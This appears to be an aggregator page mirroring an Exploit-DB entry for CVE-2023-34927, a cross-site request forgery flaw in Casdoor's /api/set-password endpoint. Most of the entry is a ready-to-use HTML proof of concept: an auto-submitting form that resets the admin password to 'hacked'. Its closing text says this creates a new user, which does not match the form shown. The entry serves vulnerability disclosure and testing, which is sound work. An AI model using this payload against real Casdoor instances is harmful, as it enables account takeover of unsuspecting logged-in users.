1
[webapps] Casdoor < v1.331.0 - '/api/set-password' CSRF
source link: https://www.exploit-db.com/exploits/51961
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Casdoor < v1.331.0 - '/api/set-password' CSRF
# Exploit Title: Casdoor < v1.331.0 - '/api/set-password' CSRF
# Application: Casdoor
# Version: <= 1.331.0
# Date: 03/07/2024
# Exploit Author: Van Lam Nguyen
# Vendor Homepage: https://casdoor.org/
# Software Link: https://github.com/casdoor/casdoor
# Tested on: Windows
# CVE : CVE-2023-34927
Overview
==================================================
Casdoor v1.331.0 and below was discovered to contain a Cross-Site Request Forgery (CSRF) in the endpoint /api/set-password.
This vulnerability allows attackers to arbitrarily change the victim user's password via supplying a crafted URL.
Proof of Concept
==================================================
Made an unauthorized request to /api/set-password that bypassed the old password entry authentication step
<html>
<form action="http://localhost:8000/api/set-password" method="POST">
<input name='userOwner' value='built-in' type='hidden'>
<input name='userName' value='admin' type='hidden'>
<input name='newPassword' value='hacked' type='hidden'>
<input type=submit>
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</html>
If a user is logged into the Casdoor Webapp at time of execution, a new user will be created in the app with the following credentials
userOwner: built-in
userName: admin
newPassword: hacked
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK